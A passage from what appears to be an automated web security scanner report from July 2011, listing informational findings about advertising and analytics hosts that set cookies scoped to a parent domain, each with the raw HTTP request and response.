rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SZJZ="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4umiKbjeSRFG1WGV7v3P2wuhddhrqwvMRjk0BenkJXocfzEwn+Nqhfv9uk/5yFLDCoDEiXP/hOV/sixRxjRF5rWB9KnHODU3B/yiV31fU9eC47+7M/+n0rHdBD4ZxTqL+i57Kfedz/cOyQJ/yqrT8WH56MJW2k/Y9CySxYR40lREQTsrWG7iHX/ZXcgbRha1qYshbnj41ek4M+T6JcKCxkbH15JB/en3mXv1AsBpaE/NatqWqHNyHQHJfAhdEnyH1+AAopspuM3siXVWxrdxhMapoJxsBhSSal7CXpZYG+uwKX6/HBBoo1QiOnTYinh15lebN38dWtzvNR2O+WFyXzCozolPtxDwm0dHcYAcuFfIr8QFcmjsXeoy54UcbFQfkl9uHXtLBbnuMbnFxbNwaHE//LzUfc5hb2GScAS+tt37fQYS17jN3hBQaRrUBkzt7rfFLMsvMHbbyYv3KfLRCE3w09MCuPqRLiZY3ytjjsY6apkPVVkOf7RGTxh3YfEL6eFDcKTCpWqfnef4KW5APHU9wMNAvLlgroCAf/NhO2U3Y/GfwP4tEvTYLJN23RLPRD8S8OCoPmsUEcTjYSdXrAa+japzdcP3mqBhAwNNo4MEXKPVwsppVJe0EX3fGU/z4laDN06Bl4R1L1Ud+xKxsSeEJJVA4fdmtNkncbfRp/AuusRsiMiJmM8wEh9cHMeuWvC/1JGAquOj+tGnyCfumeubLuDosKPCGVUatVhMm8Un4rKjml83L7IXGsViPmi+mSBR6ghqHQjD4aMO749hTnc8Y8YtOlKc7ILWPtzWq1qxsPOFXM/G/zC/lKJdZpuX37zzVp/oTsbOePRvoa6pns4A4/pYni1f1cOWO4QmossHVIGr7gqKt2dJIcAbrZspS2DHtJse2yV6D948mxs5iyfph8iLvlPiGAk70vnVSIWhOxIRAf1Hubw1TQuNP9oTufqhhBrP9GvCENRUI1T3eVdbDJcIJdZFtu6QHj8+l4WNRDiGqpozNwcSCkTIbu9FwpFhC0Hh4P0m7hqR4Kv6Lei7atV+4x3ApSzcU30KQIJYd24qeaXX0AM2NZKIsIh/PCCWU30b2w1A+4XoXLNY9hpJjWMQAk2uIG/HXtcco1ZuZjVGniEqwPjgK3X0T7ZWByLmJvp8X3Klk8GibfUeyNvNx6XGzxASGUkyGEWOfMUp9fjZ6IpP+EVsoSlBDHB+J8FDy1Tna3CDV1xsTytG+31h1s3uvGX6QIQ3GbvJENudrwhqTQb3dewEm3Rg/SAyb0xljjjF/rEoV/y1xhGU6vwWSmXhsTq0YU2p5nRFroYcOuwzmqM5qplSuVq/oPqIEHSWbSxqLpJLHzwjNOZLwAqynbTkWi6aUeO3RHvwfmwQ70KqDFHoSqXTseyacFksSkrt04Fkkh7y+uzYAwdvOl7Jd3QinEFa0FNW49rkGHj3tqQ7u6bJXw+d0dwc5+xla32jQflwdmRpSh1ssB1xZMcK7cy3AYW/iT+NpHbx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=699224&t=2
Content-Length: 0
Date: Tue, 19 Jul 2011 14:57:47 GMT

13.26. http://adx.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)mByB_/)J710+(4l>TXOaXO%_6_36WM4Yq>skA[s/0Qr@W!2(.G`g(nU07x`Dpe)H6bl?7IA=UWwJ)Ks9?Di4J!>jF#A1tamxhGS]Vloy'Tm2mh=Li=?aU3%!AdhY?VG2rb.jLRacQ9Eg:k5=<AryA-#Y5DZ'8pFj/d9H`0J+H%H=(=1-c5UJXSLk-@qNNZSA+r5AD!_#>ruY2:2hJR1=WDQ9@`U`OJ6f6(uA0%=-ZM>rQPnbc5lqWa^$buUIRRbVnem@21?n/CYuwpeFBs##K0E*W>..9dqmsSak?KkXe09CGc*+$9q2tJ4>/E8+7TYMhEbZEJ!7=DPbftrOh:Xzf+:(dSbb.h'3LCH[34PMTgG6KE^$4d`O9*?AAeZHBSQ8+EbDf=/q'EQ_Yo51AlFgIcie^uPj]Y!4>XYkWO<ke)sc@yb3F`MA6DRs`AgOQBx7EJTw7U]ovu.$(d_gvLL+WcVA$UMBF6t=*]WH[<9I9qV0bWjU8IgZ(2eSjuq.)c2[57vyU#<EqD1'_BZBcD237CLvUgUT'f+UkTYi[Pun_r7[w7K@yf8>:19J=Mv(1[`:3i<f[V)AN.masdUq**VuF+h'!l!6Ej0V!/y-@3m1nC/9cF[kw$/VjSSo3h0w2e2*q0!_v+vxBM@wJ?FFX0tRR)O9P<u6gB)wmh*SNVa*@Ln<::/90pW!Z_/<of@*$LQFY8VhmR4wqVI=v]p4+YOrmsG$Se4Vc'BQP(3Ala%#1YD-1oBLaYc8Ec6S'j<7>vhHD8o/Q21I`jp9R$-%^F3b-ywizA@B5$aV':mlud; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)mByB_/)J710+(4l>TXOaXO%_6_36WM4Yq>skA[s/0Qr@W!2(.G`g(nU07x`Dpe)H6bl?7IA=UWwJ)Ks9?Di4J!>jF#A1tamxhGS]Vloy'Tm2mh=Li=?aU3%!AdhY?VG2rb.jLRacQ9Eg:k5=<AryA-#Y5DZ'8pFj/d9H`0J+H%H=(=1-c5UJXSLk-@qNNZSA+r5AD!_#>ruY2:2hJR1=WDQ9@`U`OJ6f6(uA0%=-ZM>rQPnbc5lqWa^$buUIRRbVnem@21?n/CYuwpeFBs##K0E*W>..9dqmsSak?KkXe09CGc*+$9q2tJ4>/E8+7TYMhEbZEJ!7=DPbftrOh:Xzf+:(dSbb.h'3LCH[34PMTgG6KE^$4d`O9*?AAeZHBSQ8+EbDf=/q'EQ_Yo51AlFgIcie^uPj]Y!4>XYkWO<ke)sc@yb3F`MA6DRs`AgOQBx7EJTw7U]ovu.$(d_gvLL+WcVA$UMBF6t=*]WH[<9I9qV0bWjU8IgZ(2eSjuq.)c2[57vyU#<EqD1'_BZBcD237CLvUgUT'f+UkTYi[Pun_r7[w7K@yf8>:19J=Mv(1[`:3i<f[V)AN.masdUq**VuF+h'!l!6Ej0V!/y-@3m1nC/9cF[kw$/VjSSo3h0w2e2*q0!_v+vxBM@wJ?FFX0tRR)O9P<u6gB)wmh*SNVa*@Ln<::/90pW!Z_/<of@*$LQFY8VhmR4wqVI=v]p4+YOrmsG$Se4Vc'BQP(3Ala%#1YD-1oBLaYc8Ec6S'j<7>vhHD8o/Q21I`jp9R$-%^F3b-ywizA@B5$aV':mlud

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByB_/)J710+(4l>TXOaXO%_6_36WM4Yq>skA[s/0Qr@W!2(.G`g(nU07x`Dpe)H6bl?7IA=UWwJ)Ks9?Di4J!>jF#A1tamxhGS]Vloy'Tm2mh=Li=?aU3%!AdhY?VG2rb.jLRacQ9Eg:k5=<AryA-#Y5DZ'8pFj/d9H`0J+H%H=(=1-c5UJXSLk-@qNNZSA+r5AD!_#>ruY2:2hJR1=WDQ9@`U`OJ6f6(uA0%=-ZM>rQPnbc5lqWa^$buUIRRbVnem@21?n/CYuwpeFBs##K0E*W>..9dqmsSak?KkXe09CGc*+$9q2tJ4>/E8+7TYMhEbZEJ!7=DPbftrOh:Xzf+:(dSbb.h'3LCH[34PMTgG6KE^$4d`O9*?AAeZHBSQ8+EbDf=/q'EQ_Yo51AlFgIcie^uPj]Y!4>XYkWO<ke)sc@yb3F`MA6DRs`AgOQBx7EJTw7U]ovu.$(d_gvLL+WcVA$UMBF6t=*]WH[<9I9qV0bWjU8IgZ(2eSjuq.)c2[57vyU#<EqD1'_BZBcD237CLvUgUT'f+UkTYi[Pun_r7[w7K@yf8>:19J=Mv(1[`:3i<f[V)AN.masdUq**VuF+h'!l!6Ej0V!/y-@3m1nC/9cF[kw$/VjSSo3h0w2e2*q0!_v+vxBM@wJ?FFX0tRR)O9P<u6gB)wmh*SNVa*@Ln<::/90pW!Z_/<of@*$LQFY8VhmR4wqVI=v]p4+YOrmsG$Se4Vc'BQP(3Ala%#1YD-1oBLaYc8Ec6S'j<7>vhHD8o/Q21I`jp9R$-%^F3b-ywizA@B5$aV':mlud; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:10 GMT

GIF89a.............!.......,........@..L..;

13.27. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.choicestream.com
Path:	/instr/api/8e360375d27a5381/a1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 466791c2-9f94-48c8-8658-3ff00fec0bac
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 81
Cache-Control: private
Content-Length: 81
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

csAny.Transport.callback('0',{"status":{"message":"OK","code":0},"reco_sets":[]})

13.28. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 14:26:45 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=38081733&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fim%26jsref%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26rnd%3D1311085610127&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 14:26:45 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 14:26:45 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.29. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:49:01 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:01 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:49:01 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.30. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
